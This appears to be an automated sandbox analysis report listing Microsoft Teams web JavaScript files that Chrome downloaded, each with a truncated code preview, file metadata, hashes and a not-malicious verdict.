                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/990521-e9325ffc81da8165.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[990521],{990521:(e,s,a)=>{a.d(s,{T:()=>n});var l=a(957032),C=a(395225),t=a.n(C),c=a(485529),i=a(829289);const n=(0,c.Ke)({svg:({classes:e})=>(0,l.Y)("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:e.svg,children:[(0,l.Y)("g",{className:t()(i.Q.outline,e.outlinePart),children:[(0,l.Y)("path",{fillRule:"evenodd",clipRule:"evenodd",d:"M8 2C6.89543 2 6 2.89543 6 4V14C6 15.1046 6.89543 16 8 16H14C15.1046 16 16 15.1046 16 14V4C16 2.89543 15.1046 2 14 2H8ZM7 4C7 3.44772 7.44772 3 8 3H14C14.5523 3 15 3.44772 15 4V14C15 14.5523 14.5523 15 14 15H8C7.44772 15 7 14.5523 7 14V4Z"}),(0,l.Y)("path",{d:"M4 6.00001C4 5.25973 4.4022 4.61339 5 4.26758V14.5C5 15.8807 6.11929 17 7.5 17H13.7324C13.3866 17.5978 12.7403 18 12 18H7.5C5.567 18 4 16.433 4 14.5V6.00001Z"})]}),(0,l.Y)("g",{className:t()(i.Q.filled,e.filledPart),children:[(0,l.Y)("path",{d:"M6 4C6 2.89543 6.8954
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (56687)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):56795
                                                                                                                                                                                                                                                                            Entropy (8bit):4.496605446110163
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:QdNHz8zyV/Vt8aHqMYqbB9OgCumyac8HD95pHX1ufXF/ShSD2QLEmccca+ENvHE2:Qd5V/VFjYgCHyac855p31uUujr1
                                                                                                                                                                                                                                                                            MD5:DD7482008E840BA334E2F9BE103CC648
                                                                                                                                                                                                                                                                            SHA1:1163A175C569AC0EC75255AB4E4F9D0D75F7B6EB
                                                                                                                                                                                                                                                                            SHA-256:DFBCCC584F4CC241D4B8C7BB982AA1654D24B885150868E661D2611E1D94056E
                                                                                                                                                                                                                                                                            SHA-512:2E539CE02213EBE808720D56F0EE7662D0BCF3B06B9321393B65A3A19D9EF661A812BBCB7AF6B5AE9083E64C89243ABC09416AAD6C6051FB3C7A44B1E9D6AF67
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/750818-e52b4fe9a143f5cd.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[750818],{750818:(a,l,Z)=>{Z.d(l,{_jO:()=>e,iNx:()=>m,gcm:()=>v,_Xk:()=>h,IjV:()=>M,Ylq:()=>H,W_M:()=>r,yuG:()=>i,NGN:()=>V,nUb:()=>o,oAB:()=>U,Crl:()=>C,tyz:()=>A,LKJ:()=>t,xeZ:()=>L,dbj:()=>d,Cke:()=>n,aUo:()=>u,dgX:()=>s,lr5:()=>g,k$2:()=>R,m_5:()=>F,BKw:()=>D,Njq:()=>p,QWN:()=>k,CX7:()=>f,V6R:()=>w,Xwn:()=>E,nvQ:()=>y,XUe:()=>S,c4C:()=>b,yly:()=>j,_B:()=>_,wSM:()=>O,onv:()=>x,iG:()=>B,nrH:()=>W,J3O:()=>Q,qQV:()=>T,ALn:()=>q,$HY:()=>z,ZJc:()=>N,MVw:()=>P,akU:()=>X,WhM:()=>G,CbY:()=>$,WHO:()=>I,k_r:()=>J,POZ:()=>K,Lpw:()=>Y,OGg:()=>aa,O6n:()=>la,pQD:()=>Za,jsk:()=>ca,FT3:()=>ea,Htf:()=>ma,xhg:()=>va,d_C:()=>ha,f8w:()=>Ma,pwR:()=>Ha,Enj:()=>ra,Qvr:()=>ia,zBW:()=>Va,LWr:()=>oa,d0y:()=>Ua,cBQ:()=>Ca,Ult:()=>Aa,pyq:()=>ta,smH:()=>La,Gdy:()=>da,f0V:()=>na,VEF:()=>ua,yus:()=>sa,IN0:()=>ga,olq:()=>Ra,W6w:()=>Fa,Sz$:()=>Da,y7H:()=>pa,p$u:()=>ka,ntX:()=>fa,DxS:()=>wa,Hi:()=>Ea,Y6r:()
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (21486)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):21594
                                                                                                                                                                                                                                                                            Entropy (8bit):5.170715153687207
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:k24mpfRVWom31rMIzQ15YmNy9140jxAnSjatS5o4FjatvRYfhEB5jP6S1I+:k24mpJVWom31rMIzQ1SmNy91401AZRYM
                                                                                                                                                                                                                                                                            MD5:FF8030A187A57F36F9E03916F84C47E2
                                                                                                                                                                                                                                                                            SHA1:634558A0AD110BB6B76225F8F3A05ADD6A828B58
                                                                                                                                                                                                                                                                            SHA-256:4CE38EFA5FC9ABAC0FB8367AFD9E10C4A96035E347D966DF62D1FF8016FB82AC
                                                                                                                                                                                                                                                                            SHA-512:DDF81CB52E920221C553977DBFE9BB51E599371E4F6E297E8B0C840FAA5768D377B1F5F6A06C902F63193F0C0835BDA4EE96C10714CDD77599C0324790BD21F4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[872355],{128943:(e,t,i)=>{i.d(t,{K:()=>l});var r=i(332752),s=i(34655),n=i(805809),o=i(355515);const a={transitiveMembersCount:"beta/users/{dlId}/GroupTransitiveMembersCount",transitiveMembers:"beta/users/{dlId}/GroupTransitiveMembers"};class l{constructor(e,t,i){this.mtSend=t,this.logger=e.newLogger("Distribution List Service","services-io-distribution-list");const{isDistributionListServiceEnabled:s}=i.get(r.w.DistributionLists);this.isServiceEnabled=s||!1}async getTransitiveMembersCountForDistributionList(e){if(!this.isServiceEnabled)return Promise.reject(this.createErrorForDisabledService("getTransitiveMembersCountForDistributionList"));const t=a.transitiveMembersCount.replace("{dlId}",e);try{const e=await this.mtGet(t,"getTransitiveMembersCountForDistributionList").then((({body:e})=>e.json()));return Promise.resolve(e)}catch(e){return this.logger.error("getTransitiveMember
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (36004)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):36114
                                                                                                                                                                                                                                                                            Entropy (8bit):5.435060898875738
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:RqPw6S3lD/T/HAVJ/Oo73IUoMcaqlg/jEWu4MkUKMSpqlXD9MjIIZEQJP6Q5mzPj:TBDlSpBFdZ5g1
                                                                                                                                                                                                                                                                            MD5:7DC0E45633D4132B688805FB2CC8F2B1
                                                                                                                                                                                                                                                                            SHA1:4AC87319F87FBC51DA0E78759AB24795067BBE7E
                                                                                                                                                                                                                                                                            SHA-256:8B11A2966D7FE79E636CEE0C0D384A22E27D20E40EF285AE21F0DD8AC8B49E0A
                                                                                                                                                                                                                                                                            SHA-512:947177BB1CFEFEBAF32EDF749AFF9C68D1A30D3929F9906796C7B2C9436F7D8E5D9EB34DDA7EFA3B98A1B4347233F55E8E7D4605A455A60776B853107F0CE95C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[193021],{928380:(e,t,r)=>{var o,n;r.d(t,{sk:()=>o,$n:()=>n,I6:()=>i,Vt:()=>s,UU:()=>a,EJ:()=>c,Rm:()=>l}),function(e){e.CONFIGURATIONS="configurations",e.CONTEXTUAL_NOTIFICATIONS="contextual-notifications",e.END="end",e.HEADER="header",e.IN_APP_NOTIFICATIONS="in-app-notifications",e.MAIN="main",e.MID_NAV="mid-nav",e.MODAL="modal",e.MONITOR="monitor",e.NAV="nav",e.NAV_CONTROLS="nav-controls",e.NOTIFICATIONS="notifications",e.PRE_CACHE="pre-cache",e.START="start",e.SUBNAV="sub-nav",e.TITLE_BAR="title-bar",e.TOASTS="toasts"}(o||(o={})),function(e){e.configurations="configurations",e.contextualNotifications="contextualNotifications",e.end="end",e.header="header",e.inAppNotifications="inAppNotifications",e.main="main",e.midNav="midNav",e.modal="modal",e.monitor="monitor",e.nav="nav",e.navControls="navControls",e.notifications="notifications",e.preCache="preCache",e.start="start",e
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2467)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):2592
                                                                                                                                                                                                                                                                            Entropy (8bit):4.845876308583554
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:wp3sp3OlsgW0ueB6NsiI1/16xPxUBnBOr1P/tdwZf/TvopbpQDGODGjkWWpC9tje:OsT8YVDwZXad/+r
                                                                                                                                                                                                                                                                            MD5:016A2F33A3DE3F6B0C9DD22D2E891D1F
                                                                                                                                                                                                                                                                            SHA1:0DD5EAC7743D24C1657A84E0CAB23E4E3034E9E3
                                                                                                                                                                                                                                                                            SHA-256:6A2E762D7B9A735DB69AFD281D4B45D0910E7F1CDC5E3F1ECEE6D19170FE65C4
                                                                                                                                                                                                                                                                            SHA-512:478CA92EF47710B70B4C640793862F8041AE6E1592D073E678688DE03F70692BB27405C37A414769BA0B2DB18B39B1296E7C13AC1D286D44DFC2C11EC4F0E0B5
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/recurrence-locale-en-us-651b2b023666e1f6.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[951405],{568561:(e,r,t)=>{t.r(r),t.d(r,{default:()=>n});const n={namespace:"recurrence",locale:"en-us",translations:{and_separator_format:"{{value1}} and {{value2}}",comma_separator_format:"{{value1}}, {{value2}}",meeting_recurrence_pattern_daily_mf:"{interval, plural, =1{Occurs daily} =2{Occurs every other day} other{Occurs every # days}}",meeting_recurrence_pattern_first_weekInMonth:"First",meeting_recurrence_pattern_first_weekInMonth_lower_case:"first",meeting_recurrence_pattern_fourth_weekInMonth:"Fourth",meeting_recurrence_pattern_fourth_weekInMonth_lower_case:"fourth",meeting_recurrence_pattern_last_weekInMonth:"Last",meeting_recurrence_pattern_last_weekInMonth_lower_case:"last",meeting_recurrence_pattern_monthly_mf:"{interval, plural, =1{Occurs every month on day {day}} =2{Occurs every other month on day {day}} other{Occurs every # months on day {day}}}",meeting_recurr
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (47016)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):47124
                                                                                                                                                                                                                                                                            Entropy (8bit):5.288745142117651
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:kCVHH8encpTYeGq1q0V0UDA8MnSj5udSTYSzPz2:bH8enclYpmJV5DA8MnSj5udgYYa
                                                                                                                                                                                                                                                                            MD5:F6D80FCD9D1F9EAFB54E2B26C2A1BE5A
                                                                                                                                                                                                                                                                            SHA1:ACF87FC3F2AF50DDCF4FCABB5BCDC8DAE6E878D3
                                                                                                                                                                                                                                                                            SHA-256:511C92C1498EE0E4576F214C41C7499DD9B8A2CB94DF79934A48F0707B3B1AED
                                                                                                                                                                                                                                                                            SHA-512:A1BBF2851B958F5F398EBBEB2629607E63DA99A7849628657CC70F9855827A56E53E98C55AF6F041AE3B0E71DB6ABA6E4066712B5D93DDD903F5CC6275AA425A
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[985157],{943015:(e,t,r)=>{"use strict";function n(e,t){var r="undefined"!=typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(r)return(r=r.call(e)).next.bind(r);if(Array.isArray(e)||(r=function(e,t){if(!e)return;if("string"==typeof e)return i(e,t);var r=Object.prototype.toString.call(e).slice(8,-1);"Object"===r&&e.constructor&&(r=e.constructor.name);if("Map"===r||"Set"===r)return Array.from(e);if("Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r))return i(e,t)}(e))||t&&e&&"number"==typeof e.length){r&&(e=r);var n=0;return function(){return n>=e.length?{done:!0}:{done:!1,value:e[n++]}}}throw new TypeError("Invalid attempt to iterate non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function i(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r<t;r++)n[r]=e[r];return n}function o(e,t){for(var r=0
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33242)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):33350
                                                                                                                                                                                                                                                                            Entropy (8bit):5.456986294670368
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:VvfRbMtKylVbwXH1eRvk/WCwrWrJFWzSwnAMPjrLhz6/ft9S6hchueSsCxkbX9Wm:Vx3j5M1x63t9Sjw1WyWX
                                                                                                                                                                                                                                                                            MD5:64EBEF1DD8782283F077F1B74F2941FF
                                                                                                                                                                                                                                                                            SHA1:77C7F7BC07A2081E5DEA8548B97710C8C680B8D9
                                                                                                                                                                                                                                                                            SHA-256:F0F882EFAA5CAF321ABC707FB40BD4E9FAB3E711D67BAEC99D3DF4EB15E24CD8
                                                                                                                                                                                                                                                                            SHA-512:2DAB868C40E14DDA005E6F3AD4A974594B3908447B7D7D427593164C005B8C11BA22C7D8D5F8AE4666B0ED12A9BDA8D51946C856B1F2B88EAF22C75E36CA271D
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/660886-37b7c3b3e47fc52a.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[660886],{305536:(e,t,i)=>{i.d(t,{Z8:()=>n,X0:()=>o,_v:()=>l,lW:()=>d,Gy:()=>c,L7:()=>u,rd:()=>m,HT:()=>p});var n,a=i(355515),r=i(34655),s=i(364819);!function(e){e.Text="text/plain",e.Html="text/html",e.Png="image/png"}(n||(n={}));const o=e=>{const t=e.document.getSelection();if(t){if(t.toString())return!0;if(t.rangeCount>0){if(t.getRangeAt(0).cloneContents().childElementCount>0)return!0}}return!1},l=(e,t,i,a)=>{const r=e.document,o=r.createElement("div");(0,s.assign)(o.style,{color:"transparent",outline:"none",boxShadow:"none",background:"transparent"}),o.setAttribute("aria-hidden","true");const l=r.createElement(t);((e,t)=>{(0,s.assign)(e,t),t&&Object.keys(t).forEach((i=>e.setAttribute(i,t[i])))})(l,i),a&&(0,s.assign)(l.style,a),o.appendChild(l),r.body.appendChild(o);const d=r.getSelection();if(d){d.removeAllRanges();const e=r.createRange();e.selectNode(l),d.addRange(e)}cons
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):224064
                                                                                                                                                                                                                                                                            Entropy (8bit):5.130481619229709
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:3072:4HzKeBqX65uDTab5q6ob04mdMh5vy5Rd5/xxLq0FRhsB7451gO:4ATab54jh5vy5Rd5S0FRhS743h
                                                                                                                                                                                                                                                                            MD5:550D3C6898061451EB40B2FE79602ECF
                                                                                                                                                                                                                                                                            SHA1:BEFA3AFFE3672531AEC410DB9DE7BBFD77D58288
                                                                                                                                                                                                                                                                            SHA-256:55BE2581396C9BBF282D2D36840C5442FDE9F5A549BF5B906DCBDAEDB235FDEF
                                                                                                                                                                                                                                                                            SHA-512:A9C71BE48AC58D07BE3E8D483A28704D76650B7AB8D7487885C24FB07EA10438C9858D6543D3D8A4AC507D73777B36F73CC0ADEF17EF22C20DACA7A6BDCF4812
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[917004],{122454:(e,t,a)=>{var n;a.d(t,{A:()=>c});var i=new Uint8Array(16);function o(){if(!n&&!(n="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto)))throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return n(i)}const r=/^(?:[0-9a-f]{8}-[0-9a-f]{4}-[1-5][0-9a-f]{3}-[89ab][0-9a-f]{3}-[0-9a-f]{12}|00000000-0000-0000-0000-000000000000)$/i;const _=function(e){return"string"==typeof e&&r.test(e)};for(var s=[],l=0;l<256;++l)s.push((l+256).toString(16).substr(1));const d=function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:0,a=(s[e[t+0]]+s[e[t+1]]+s[e[t+2]]+s[e[t+3]]+"-"+s[e[t+4]]+s[e[t+5]]+"-"+s[e[t+6]]+s[e[t+7]]+"-"+s[e[t+8]]+s[e[t+9]]+"-
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1179)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):1287
                                                                                                                                                                                                                                                                            Entropy (8bit):5.226870802404122
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:24:wp3sp38nmCamm7wybSHIoWLTMz0r1eTM9oWoWOuTf+Udtk7Sz+KIJYbOc:wp3sp3j/VTMzBAfrf+wtXz1IOZ
                                                                                                                                                                                                                                                                            MD5:B6D1A6A743B008B467C2395A4485F390
                                                                                                                                                                                                                                                                            SHA1:899A6E8EE6B23EE0E49F0B89C33ED5CB4B722226
                                                                                                                                                                                                                                                                            SHA-256:F1F36623804CDDD4D5A0FB0FD6C3C30E45FE86DBE5D7C2FAE78298F8E7545A36
                                                                                                                                                                                                                                                                            SHA-512:49AEF8E6862D335E794C13A91651A3DE375B3A1AAD5604B73D015657DE39104D86C1283F5347B1D92C733449F53AC0DBF001A98DEE2C8C157EF793EF7EC01063
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/120951-1965c2e12a30acee.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[120951],{120951:(e,a,t)=>{t.d(a,{D:()=>i});var s=t(513432),l=t(395225),n=t.n(l),c=t(485529),r=t(829289),i=(0,c.Ke)({svg:function(e){var a=e.classes;return s.createElement("svg",{role:"presentation",focusable:"false",viewBox:"2 2 16 16",className:a.svg},s.createElement("path",{className:n()(r.Q.outline,a.outlinePart),d:"M15.8527 7.64582C16.0484 7.84073 16.0489 8.15731 15.854 8.35292L10.389 13.8374C10.1741 14.0531 9.82477 14.0531 9.60982 13.8374L4.14484 8.35292C3.94993 8.15731 3.95049 7.84073 4.1461 7.64582C4.34171 7.4509 4.65829 7.45147 4.85321 7.64708L9.99942 12.8117L15.1456 7.64708C15.3406 7.45147 15.6571 7.4509 15.8527 7.64582Z"}),s.createElement("path",{className:n()(r.Q.filled,a.filledPart),d:"M15.793 7.73271C16.0787 8.03263 16.0672 8.50737 15.7672 8.79306L10.5168 13.7944C10.2271 14.0703 9.77187 14.0703 9.4822 13.7944L4.23173 8.79306C3.93181 8.50737 3.92028 8.03263 4.2059
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65532), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):106801
                                                                                                                                                                                                                                                                            Entropy (8bit):5.382849210836161
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:Vn8xnFvCQG3wq7g1Ctzg+ohY5dtiyxIDQrdbCJHoNXxYsAZ0LiyxIDQ9nl6/BjQP:Vn8xnFvZGxgYNfPTIiLPTstKjLT+xNs
                                                                                                                                                                                                                                                                            MD5:A6016E13434CA478163FCBFE67A5E2C8
                                                                                                                                                                                                                                                                            SHA1:2D757616159C21EFD21D81A8A640DE69E7772D7C
                                                                                                                                                                                                                                                                            SHA-256:543396C48663471C8D283F2EC6A0C8CE694150E83B36745708A2A8FDE7088E3E
                                                                                                                                                                                                                                                                            SHA-512:16FB08CE8FD12A5567258EE77A2D42B90578816B52FD7763BA6BB447489214FAFFF60BFD4400D519C966008AC136A67BD5385CD92EC2AD3CF67B88A3F4F36BA0
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[151748],{402986:(e,n,t)=>{"use strict";t.d(n,{A:()=>r});var a=t(246361);const r=t.n(a)()},7883:(e,n,t)=>{"use strict";function a(e){const n=e.regex,t={},a={begin:/\$\{/,end:/\}/,contains:["self",{begin:/:-/,contains:[t]}]};Object.assign(t,{className:"variable",variants:[{begin:n.concat(/\$[\w\d#@][\w\d_]*/,"(?![\\w\\d])(?![$])")},a]});const r={className:"subst",begin:/\$\(/,end:/\)/,contains:[e.BACKSLASH_ESCAPE]},i={begin:/<<-?\s*(?=\w+)/,starts:{contains:[e.END_SAME_AS_BEGIN({begin:/(\w+)/,end:/(\w+)/,className:"string"})]}},s={className:"string",begin:/"/,end:/"/,contains:[e.BACKSLASH_ESCAPE,t,r]};r.contains.push(s);const o={begin:/\$?\(\(/,end:/\)\)/,contains:[{begin:/\d+#[0-9a-f]+/,className:"number"},e.NUMBER_MODE,t]},c=e.SHEBANG({binary:`(${["fish","bash","zsh","sh","csh","ksh","tcsh","dash","scsh"].join("|")})`,relevance:10}),l={className:"function",begin:/\w[\w\d_]*\s*\(\s*\)\s*\{
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):98053
                                                                                                                                                                                                                                                                            Entropy (8bit):5.291610206119134
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:KJUrjVjLJ3PNHcDKxCxp9sv9RIVd/nvp8yV57sy7JcgSEZ:KJUrjVjLpPNH61r3HH75ygJ
                                                                                                                                                                                                                                                                            MD5:7DA6B8BD95515C63FFAE93208EF334CD
                                                                                                                                                                                                                                                                            SHA1:74FE0701E56B490B4596A4E31936E33ECCC4AB2D
                                                                                                                                                                                                                                                                            SHA-256:BE110624B15D21F194D898C8986C85EB9C28E4203370734293D22728E59D6EC2
                                                                                                                                                                                                                                                                            SHA-512:0DE5EB1B55F8B66CCBB405BE1B6288F720347F1BE1949379783F2C5957E135DB6F39BEB33E834B9A4C1C24A8E8175824A0564E60D92547A2994185589D4BDAEC
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[610984],{514139:(e,t,n)=>{n.r(t),n.d(t,{ViewSchemaExecutor:()=>Po,createViewSchemaTerminatingLink:()=>Eo,viewSchemaPossibleTypes:()=>No.v});var a={};n.r(a),n.d(a,{node:()=>ce,views:()=>de});var i={};n.r(i),n.d(i,{Query:()=>a});var o={};n.r(o),n.d(o,{meControl:()=>pe});var r={};n.r(r),n.d(r,{accountLink:()=>xe,changePictureAriaLabel:()=>Le,changePictureTooltipText:()=>De,disableUPC:()=>ke,editNameButtonAriaLabel:()=>Oe,editNameButtonTooltipText:()=>Ie,hideAvatarUpdate:()=>Ue,hideNameEdit:()=>Be,id:()=>Pe,openUPCButtonAriaLabel:()=>Ne,openUPCButtonTooltipText:()=>Ee});var s={};n.r(s),n.d(s,{clearAfterCustomText:()=>He,clearAfterFourHrText:()=>Qe,clearAfterHalfHrText:()=>Re,clearAfterNeverText:()=>Ve,clearAfterOneHrText:()=>qe,clearAfterTodayText:()=>We,clearAfterTwoHrText:()=>Ge,clearAfterWeekText:()=>$e,id:()=>Fe});var l={};n.r(l),n.d(l,{hideSignOut:()=>je,id:()=>ze,menuListAr
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (14080)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):14188
                                                                                                                                                                                                                                                                            Entropy (8bit):4.548444802364332
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:morrVCmTcgu/dwwIXxmpnNnkkdYv+WRFqFK/WP5MABOH8P2oKullWqFjhRONOb+t:morrVrcgAIXxmEv+WDJw5MAB+B2hRcJt
                                                                                                                                                                                                                                                                            MD5:EAE6D5D8A335D7E78B87A584045664BE
                                                                                                                                                                                                                                                                            SHA1:16F37B3649C086DBC522F19D34C88F135DD62886
                                                                                                                                                                                                                                                                            SHA-256:332670B50B9E5C00C333394FE7F1660E95B91A3BAC311A32B07C4623AD014BED
                                                                                                                                                                                                                                                                            SHA-512:D26C7E0204E471EDFED62FCCD2384B74C70F40097BB0D9C03045279D277F61FD3B3B851B0037E8BE4A046A810D99650EA53A2722BCDE08F6BBD6AF85E1E05C74
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[499319],{499319:(a,l,c)=>{c.d(l,{fG6:()=>Z,emQ:()=>h,T$n:()=>r,Tw6:()=>m,nzA:()=>C,t3G:()=>L,kNP:()=>M,mXP:()=>U,CDg:()=>g,jvo:()=>u,FUA:()=>R,N5_:()=>A,orE:()=>o,SUw:()=>k,D7b:()=>n,xZD:()=>t,RaO:()=>i,FHz:()=>v,ghe:()=>s,kt0:()=>H,ZmR:()=>b,i3f:()=>d,pgR:()=>w,GxZ:()=>F,hoY:()=>p,rLf:()=>D,geq:()=>_,cmU:()=>V,sCR:()=>f,bP_:()=>G,nbA:()=>P,ba0:()=>S,nb6:()=>q,KOR:()=>N,qGP:()=>O,g4$:()=>x,nbk:()=>z,NaX:()=>Q,Aow:()=>T,s81:()=>X,oIL:()=>$,gcA:()=>j,qrO:()=>B,mse:()=>E,JcD:()=>I});var e=c(693935);const Z=(0,e.U)("ChannelShare20Regular","20",["M3 5.5A2.5 2.5 0 0 1 5.5 3h5A2.5 2.5 0 0 1 13 5.5a.5.5 0 0 1-1 0c0-.83-.67-1.5-1.5-1.5h-5C4.67 4 4 4.67 4 5.5v5c0 .83.67 1.5 1.5 1.5h4.51a2.25 2.25 0 1 1 .12 1H5.5A2.5 2.5 0 0 1 3 10.5v-5Zm8 6.75a1.25 1.25 0 1 0 2.5 0 1.25 1.25 0 0 0-2.5 0ZM7.5 14a.5.5 0 0 0-.5.5A2.5 2.5 0 0 0 9.5 17h5a2.5 2.5 0 0 0 2.5-2.5v-5A2.5 2.5 0 0 0 14.5 7H9.87A2.
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (36105)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):36213
                                                                                                                                                                                                                                                                            Entropy (8bit):5.280487430340897
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:L0Wz+Jg23Bw8AhjErb8NAdwQhLzMpzhnzaacp3BJ6d2g8Kx:wQxAdwQlJ6Qg8i
                                                                                                                                                                                                                                                                            MD5:14F41B0CBDA1826E39A1EDA1D483D99B
                                                                                                                                                                                                                                                                            SHA1:A0E35CDC2EBBD53FCD22FC6E7108B018FA1740B5
                                                                                                                                                                                                                                                                            SHA-256:1A5C8B694DBF4FE51E91A56DFEB48A6B034E40B31424A1777DE12C515EC1971A
